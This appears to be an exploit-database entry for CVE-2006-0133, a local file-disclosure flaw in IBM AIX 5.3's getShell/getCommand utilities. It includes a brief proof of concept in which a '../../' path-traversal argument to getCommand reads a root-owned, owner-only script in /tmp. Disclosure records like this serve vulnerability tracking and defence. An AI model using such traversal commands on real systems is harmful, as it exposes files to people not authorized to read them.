IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure

Author: xfocus
type: local
platform: aix
port: nan
date_added: 2006-01-01 
date_updated: 2013-07-22 
verified: 1 
codes: CVE-2006-0133;OSVDB-22423 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/16103/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer.

-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh

ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$